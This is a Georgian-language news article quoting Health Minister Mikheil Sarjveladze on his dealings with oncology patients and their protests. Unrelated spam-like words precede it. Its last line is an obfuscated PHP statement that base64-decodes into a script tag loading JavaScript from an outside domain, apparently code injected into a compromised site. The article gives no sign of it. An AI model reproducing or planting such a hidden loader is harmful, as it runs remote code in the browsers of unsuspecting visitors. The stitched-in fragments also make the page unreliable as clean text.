celsiusi
ავერსი შნაიდერი

„ჩემი მიზანი, თითოეული იმ ადამიანის პრობლემის გადაწყვეტაა, ვისაც ონკოლოგიური დაავადებების მკურნალობასთან დაკავშირებული საკითხები აწუხებს. ამაზე სამინისტროც მოტივირებული იქნება. ჩემთვის, მოვალეობა არსებობს იმის მიღმა, თუ ვინმე პეტიციას აწერს ხელს, ან უკმაყოფილებას სხვა ფორმით გამოხატავს, არასწორად ან სწორად ავრცელებს ინფორმაციას“, - განაცხადა ჯანდაცვის მინისტრმა მიხეილ სარჯველაძემ.

მისივე განმარტებით, ონკოლოგიური პაციენტების ინდივიდუალური, თუ ზოგადი საჭიროებების დასაკმაყოფილებლად, მომავალშიც, ამავე გზით გააგრძელებს მუშაობას.

„კიდევ ერთხელ აღვნიშნავ, რომ სინამდვილეს არ შეესაბამება ინფორმაცია, თითქოს, შეხვედრაზე, ვინმეს, ან არასწორად მოვეპყარი, ან არასწორი კომუნიკაცია მქონდა. მე ვაგრძელებ ონკოლოგიური დაავადებების მქონე პაციენტების როგორც ინდივიდუალურ, ისე ზოგად პრობლემებზე მუშაობას.

თუ ამ ფონზე, თქვენ ხედავთ საჭიროებას, რომ ონკოლოგიურ პაციენტებს მოუწოდოთ, აქციები გააგრძელონ და საკუთარი ჯანმრთელობა საფრთხის ქვეშ დააყენონ, მე ამას ნამდვილად ვერ მოვიწონებ, ვერავის მხრიდან. იმის გამო, რომ ვიღაცას სურვილი აქვს, ღია კარი ამტვრიოს, ვერ მოვიწონებ, რომ რომელიმე ონკოლოგიური პაციენტის ჯანმრთელობა საფრთხეში დადგეს. არ არსებობს ამის საჭიროება.

შეგვიძლია, აბსოლუტურად გახსნილად და საჯაროდ ვიმუშაოთ თითოეულ პრობლემაზე, რომელზეც მათ შორის, იმ შეხვედრაზე იყო საუბარი. უკლებლივ ყველაფერთან დაკავშირებით, შემიძლია, სრული ინფორმაცია მოგაწოდოთ, რა თქმა უნდა, პერსონალური მონაცემების დაცვით და პაციენტების თანხმობით, თუ მათ ამის სურვილი ექნებათ“, - განაცხადა მიხეილ სარჯველაძემ.

158
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");